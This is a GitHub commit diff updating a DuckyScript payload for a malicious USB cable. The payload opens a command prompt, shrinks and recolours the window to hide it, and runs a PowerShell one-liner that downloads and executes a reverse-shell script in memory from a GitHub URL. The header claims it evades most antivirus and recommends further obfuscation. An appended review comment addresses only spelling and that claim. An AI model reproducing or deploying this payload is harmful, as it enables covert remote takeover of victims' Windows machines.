Updated the payload

Hey! I updated the payload with the suggestions, optimized the code and used the ALT SPACE DOWN to minimize (the ALT SPACE M didn't work here on my Windows 10 machine, but this way works very well).
pull/3/head
Hug1nN_ 2021-10-14 13:59:23 -03:00 committed by GitHub
parent 9120061d11
commit 0d4852700b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 10 additions and 20 deletions

@ -1,36 +1,26 @@
REM ############################################################################################################# REM #############################################################################################################
REM # This script is designed to get a reverse shell in Windows enviroments # REM # Title: Windows Reverse Shell #
REM # Description: This script is designed to get a reverse shell in Windows enviroments #
REM # with a one liner powershell command, this bypasses almost all antivirus out there and executes in memory. # REM # with a one liner powershell command, this bypasses almost all antivirus out there and executes in memory. #
REM # To use it, just clone the reverse shell, change the IP, load it into the OMG cable and wait for nc. # REM # To use it, just clone the reverse shell, change the IP, load it into the OMG cable and wait for nc. #
REM # You can even ofuscate the powershell with Invoke-Obfuscation and pyfuscation to make it even more # REM # You can even ofuscate the powershell with Invoke-Obfuscation and pyfuscation to make it even more #
REM # undetectable. # REM # undetectable. #
REM # Script made by Hug1nn_ # REM # Author: Hug1n #
REM ############################################################################################################# REM #############################################################################################################
REM @@ Opening the CMD
GUI r GUI r
DELAY 500 DELAY 500
REM @@ Opening CMD
STRING cmd.exe STRING cmd.exe
ENTER ENTER
DELAY 200 DELAY 200
REM @@ Minimizing the CMD to ofuscate it REM @@ Changing the color, risizing the CMD and executing the reverse shell in memory
STRING mode con:cols=18 lines=1 STRING cmd /C color FE&mode con:cols=18 lines=1&powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/Hug1n/reverse_shells/main/minrev.ps1')"
ENTER
DELAY 200 DELAY 200
REM @@ Chaging the color
STRING color FE
ENTER ENTER
DELAY 200 REM @@ Minimizing the CMD
REM @@ Executing the shell in memory
STRING powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/Hug1n/reverse_shells/main/minrev.ps1')"
ENTER
DELAY 200
REM @@ Minimizing
ALT SPACE ALT SPACE
DOWNARROW DOWN
DELAY 200 DOWN
DOWNARROW DOWN
DELAY 200
DOWNARROW
DELAY 200
ENTER ENTER
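
Review bot: The header block is missing a spelling pass and makes an unsupported claim. In the new column, "enviroments" and "ofuscate" are carried over in the Description lines, and the new REM comment above the combined command introduces "risizing"; correct these while the header is being restructured. The Author field now reads "Hug1n" where the replaced line read "Hug1nn_", so pick one handle and use it consistently. The description also keeps the statement that the script "bypasses almost all antivirus out there" without qualification, and nothing in the visible lines backs it up; drop the claim or state what was actually tested and on which Windows build.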